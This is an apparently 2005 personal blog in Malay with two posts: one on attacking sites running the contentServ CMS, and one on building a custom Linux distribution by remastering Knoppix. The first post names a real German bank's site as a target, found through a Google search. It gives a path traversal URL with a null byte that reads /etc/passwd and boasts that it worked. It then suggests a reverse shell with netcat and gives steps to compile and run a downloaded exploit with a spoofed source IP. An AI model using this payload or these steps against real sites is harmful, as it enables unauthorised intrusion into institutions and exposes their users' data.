Tuesday, September 27, 2005

Read /etc/passwd from contentServ Vuln.

in Bahasa
(cuba ushar http://www.packetstormsecurity.org ruangan exploit)

Sistem yang menggunakan contentServ yang disyaki mempunyai vuln.
contentServ tu salah satu cms.
cms tu content management system, satu sistem portal yang telah disiapkan utk user buat sendiri isi portal tsbt.

kemdian googlekan utk cari laman web mana yang pakai contentServ nih..
contohnya


Gebhard Bank » ad-hoc-Meldung vom 15.07.2005: Gebhard Bank weist ... - [ Translate this page ]
www.gebhardbank.de/contentserv/3.1/gebhardbank.de/index.php?StoryID=2291 - Similar pages
[ More results from www.gebhardbank.de ]


next step taip jer tambahan (yg diceritakan dalam packetstorm itu) kelihatan spt ini
http://www.gebhardbank.de/contentserv/3.1/..../etc/passwd%00

oops.gif dah boleh baca /etc/passwd nyer ker.. hehehehe

okaylah next step, mungkin kita boleh pakai reverse telnet

nota sendiri:
reverse telnet adalah salah satu teknik untuk attacker memasuki ruang sistem dengan memberi arahan kepada sistem yang hendak dimasuki (contohnya oleh en. suki) membuat telnet ke atas sistem attacker yang di pasang tool untuk reverse telnet ini. contoh tool utk reverse telnet ini ialah netcat (nc)

Exploit Compiling (on C language)

1. get the exploit
(eg. http://www.packetstormsecurity.org/0509-ex.../snortrigger.c)

2. run gcc on ur linux (or whatever c-compiler)
[root@kambing]# gcc snortrigger.c

3. redi tu yus
[root@kambing]# ./a.out
Usage: ./a.out [spoofed srcip]
Default srcip = 200.31.33.70


Thursday, August 11, 2005

Idea - Building a new Distro

in Bahasa:
google taip keyword distro

rupa2nya beratus dan beribu distro linux (or bsd) yang dihasilkan...
tengok list kat distrowatch.com pun mak ai.. macam2 nama yang ada...

katakanlah kita dah configure linux dengan memasukkan elemen2 yang penting sahaja iaitu yang sesuai dengan tugasan kita.
contohnya, kalau linux utk security, kita akan letak banyak tool, script yang siap dicompile serta xploit2 yang kita amik dari kebanyakkan homepage dan yang terkini (spt. packetstormsecurity.org).. adakah anda tahu cemmana nak hasilkan installer cd bagi linux tsbt???

kita boleh namakan dengan distro kita sendiri dan simpan dalam bentuk iso.
so kalau nak pakai atau nak backup kita just run dari pada cd yang dah ada iso tersebut.

persoalannya..
adakah anda tahu cemmana nak buat cd tersebut???
anda tahu atau tak tahu??
kalau tahu bagaimanakah caranya???

aku ada baca 2 artikel... [link1] [link2]

satu dari distro maker... dia mengambil setahun setengah utk membina distro utk companynya....

dua dari knoppix remasterer.. dia bagi tahu, hanya dua hingga lima jam sahaja utk remaster knoppix nih...

pastu aku baca how to remaster knoppix kat knoppix site..
mmg dia bagitau step by step..